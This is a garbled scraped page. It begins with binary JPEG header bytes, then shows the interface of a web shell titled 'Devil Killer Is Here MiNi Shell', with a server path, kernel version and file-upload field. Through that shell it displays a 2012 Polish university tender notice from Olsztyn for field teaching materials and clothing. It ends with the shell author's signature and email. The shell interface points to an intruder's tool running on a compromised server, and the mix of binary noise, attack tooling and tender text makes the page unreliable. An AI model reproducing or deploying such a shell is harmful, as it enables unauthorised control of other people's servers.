JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120206/30029-N-2012.html

<p class="kh_header"><b>Olsztyn: Sprzedaż wraz z dostawą materiałów do zajęć dydaktycznych oraz materiałów do zajęć terenowych w ramach realizacji projektu POKL.04.01.02-00-114/10 pt. Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska</b><br>
<b>Numer ogłoszenia: 30029 - 2012; data zamieszczenia: 06.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z dostawą materiałów do zajęć dydaktycznych oraz materiałów do zajęć terenowych w ramach realizacji projektu POKL.04.01.02-00-114/10 pt. Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprzedaż wraz z dostawą materiałów do zajęć dydaktycznych oraz materiałów do zajęć terenowych w ramach realizacji projektu POKL.04.01.02-00-114/10 pt. Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska

2. Przedmiot zamówienia został podzielony na 4 części:
Część nr 1. Materiały dydaktyczne
Część nr 2. Wzorniki barw i zestawy do konserwacji sprzętu
Część nr 3. Zestaw do notatek i klasyfikacji gleb w terenie
Część nr 4. Odzież ochronna na zajęcia terenowe

3. W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta Zamawiający zgodnie z treścią art. 29 ust. 3 Ustawy Prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1, 30.19.50.00-2, 30.22.00.00-7, 35.11.34.00-3, 38.00.00.00-5, 39.22.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem, pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego oraz jej podpisem. 

2. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 1
do Specyfikacji Istotnych Warunków Zamówienia Formularz Ofertowy. 

3. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia Formularz Cenowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający w ramach zawartej umowy przewiduje możliwości zmian dotyczące:
 
1. Zmiany terminu realizacji umowy ze względu na wystąpienie okoliczności niedających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej.

2. Zmiany terminu realizacji u względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Zamawiający w ramach zawartej umowy zmiany dotyczące: 1. Zmiany terminu realizacji umowy ze względu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych, ul. Oczapowskiego 2, pok. 311, 10-957 Olsztyn..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 10:00, miejsce: Dział Zamówień Publicznych, ul. Oczapowskiego 2, pok. 309, 10-957 Olsztyn..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu POKL.04.01.02-00-114/10 pt. Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mapa geologiczna Polski 1:200 000  -A - arkusz wydrukowany offsetowo - 60 sztuk
2. Mapa geologiczna Polski 1:200 000  -B - arkusz wydrukowany offsetowo  -60 sztuk
3. Objaśnienia do arkusza mapy wydrukowane offsetowo - 120 sztuk
4. Szczegółowa mapa geologiczna Polski 1: 50 000 wersja cyfrowa (.shp) - 120 sztuk
5. Objaśnienia do mapy cyfrowej (.pdf) - 120 sztuk
6. Mapy glebowo-rolnicze wersja wektorowa - 450 km2
7. Mirek Z., Zarzycki K., Wojewoda W., Szeląg Z. Red list of plants and fungi in Poland - 20 sztuk
8. Matuszkiewicz W., 2005 Przewodnik do oznaczania zbiorowisk roślinnych Polski. PWN Warszawa - 10 sztuk
9. Żurek S. 2006. Katalog rezerwatów przyrody na torfowiskach Polski - 10 sztuk
10. Komentarz do tabeli klas gruntów  -10 sztuk
11. L. Rutkowski. 2006. Klucz do oznaczania roślin naczyniowych Polski niżowej.PWN - 10 sztuk
12. Drozd J., Gonet S. Senesi N., Weber J. 1997. The role of humic substances in the ecosystem and in environmental protection. Proceedings of the 8 Meeting of the International Humic Substances Society (IHSS8). ISBN 83-90643-2-5-, PTSH, Wrocław, 1012 pp - 1 sztuka
13. E.A. Ghabbour and G. Davies, Eds.. 2003. Humic Substances: Natures Most Versatile Materials, Taylor and Francis, New York - 1 sztuka
14. Olaczek R., Prawdziwa Polska. Parki Narodowe  - 23 skarby przyrody - 1 sztuka
15. Kornaś J., Medwedecka-Kornaś A. 2002. Geografia roślin - 1 sztuka
16. Zarzycki K., Trzcińska-Tacik H., Różański W., Szeląg Z., Wołek J., 2002. Ekologiczne liczby wskaźnikowe roślin naczyniowych Polski - 1 sztuka
17. Mirek Z., Piękoś-Mirkowa H., Zając A., Zając M., 2002. Rośliny kwiatowe i paprotniki Polski - 1 sztuka
18. Mirek Z., Paul W., Wilk Ł., Nikiel A. 2005. Ostoje roślinne w Polsce  -1 sztuka
19. Mirek Z., Nikiel A. 2009. Rare, relikt and endangeredplants and fungi in Poland - 1 sztuka
20. Mirek Z., Piękoś-Mirkowa H. 2008. Czerwona Księga Karpat Polskich, Rośliny naczyniowe - 1 sztuka
21. F. Wieliczkiewicz, E. Zastawniak. 2008. Atlas of the Pleistocene vascular plant macrofossills of Central and Eastern Europe. PART 2 - HERBACEOUS DICOTYLEDONS - 1 sztuka
22. P. Kwiatkowski. 2006. Current state, separateness and dynamics of vascular flora of the Góry Kaczawskie (Kaczawa Mountains) and Pogórze Kaczawskie (Kaczawa Plateau). I. DISTIBUTION ATLAS OF VASCULAR PLANTS - 1 sztuka
23. P. Kwiatkowski. 2008. Current state, separateness and dynamics of vascular flora of the Góry Kaczawskie (Kaczawa Mountains) and Pogórze Kaczawskie (Kaczawa Plateau). PHYTOGEOGRAPHICAL ANALYSIS - 1 sztuka
24. R. Olaczek. 2008. Skarby przyrody i krajobrazu Polski. MULTICO - 1 sztuka
25. W. Gawryś. 2008. Słownik roślin zielnych łacińsko-polski. Oficyna Wydawnicza Botanica - 1 sztuka
26. P. Sikorski. 2009. Fitosocjologia stosowana w ochronie i kształtowaniu krajobrazu. Wydawnictwo SGGW - 1 sztuka
27. A. Zając, M. Zając, B. Zemanek (red.).2--3. Phytogeographical problems of synantropic plants. Instytut Botaniki UJ - 1 sztuka
28. Filbrandt-Czaja A. 2009. Studia nad historią szaty roślinnej i krajobrazu Borów Tucholskich - 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1, 30.22.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wzorniki barw i zestawy do konserwacji sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw do konserwacji sprzętu terenowego - 5 zestawów
- szczotka drewniana, długość 30-40 cm, z twardym włosiem,
- szmatki do czyszczenia bawełnianie,
- wazelina techniczna: 200 g,
wytrzymałość temperaturowa od -20°C do +45°C
2. Wzorniki barw Munsella na potrzeby zajęć terenowych - zestaw składa się z:
 - tablice kolorów gleb w wersji japońskiej, składające się z 12 tablic kolorów: 7,5R/10R/2,5YR/5YR/7,5YR/10YR/2,5Y/5Y/7,5Y/5 i dwie tablice Gleby (łącznie 389 wzorów barw),
- tablice kolorów gleb w wersji amerykańskiej składające się z 10 tablic kolorów i tablic gleby, karty z możliwością czyszczenia
10 zestawów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zestaw do notatek i klasyfikacji gleb w terenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Dziennik badań terenowych - 20 sztuk
Dziennik badań terenowych zawiera następujące składowe:
a) szkicownik geodezyjny drewniany, wyposażony w pasek o regulowanej długości, dwa zamki i dwei podkładki do rysowania, w tym jedną przezroczystą, format A4;
b) 200-kartkowe notatniki z białymi kartkami w kratkę formatu A4
c)ołówek
d) gumka
2. Kwasomierz polowy - zestaw do pomiaru poziomu pH gleby, zawierający bazę (porcelanowa płytka z zagłębieniem)z kolorową skalą do odczytu poziomu pH, szpatułkę, płyn Helliga, instrukcję obsługi - 20 sztuk
3. Metrówka - miara metalowa minimum 10 m, zwijana w gumowej osłonie, miara z klipem, nylonowym lub równoważnym paskiem na rękę (Zamawiający dopuszcza złożenie oferty równoważnej na podstawie art. 29 ust. 3), funkcją stopu i mechanizmem zwijającym - 20 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odzież ochronna na zajęcia terenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Obuwie gumowe - wysokie obuwie gumowe typu rainboot lub równoważne (Zamawiający dopuszcza złożenie oferty równoważnej na podstawie art. 29 ust. 3), podszewka dżersej lub poliester, podeszwa PVC z urzeźbieniem, pochłaniacz energii w obcasie, podeszwa odporna na węglowodory, tworzywo odporne na wsiąkanie wody, rozmiary 38045, damskie i męskie - 20 sztuk.
2. Płaszcz przeciwdeszczowy - z poliestru ripstop lub równoważnego (Zamawiający dopuszcza złożenie oferty równoważnej na podstawie art. 29 ust. 3) powlekanego PVC, ocieplony, zapinany na zamek błyskawiczny kryty plisą na rzepy, szwy uszczelnione, kaptur odpinany, otwory wentylacyjne pod pachami, dół regulowany za pomocą elastycznego sznurka, 5 kieszeni.
Podszewka: góra watowana, polar poliester lub równoważna (Zamawiający dopuszcza złożenie oferty równoważnej na podstawie art. 29 ust. 3), 280 g/m2, dół - watowana, tafta poliester. Wypełnienie: 100% poliester, 160 g/m2, rozmiary s-XL, damskie i męskie - 20 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com